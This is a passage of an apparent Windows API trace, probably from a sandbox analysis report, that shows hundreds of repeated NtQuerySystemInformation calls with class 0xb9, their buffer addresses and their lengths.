SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced8, Length=0x58, ResultLength=0x0) [0284.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0284.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0284.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0284.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0284.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0284.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0284.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0284.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0284.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0284.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0284.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0284.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0284.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0284.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0284.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0284.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0284.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0284.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0284.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0284.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0284.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0284.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0284.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x20, ResultLength=0x0) [0284.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0284.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0284.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0284.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0284.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 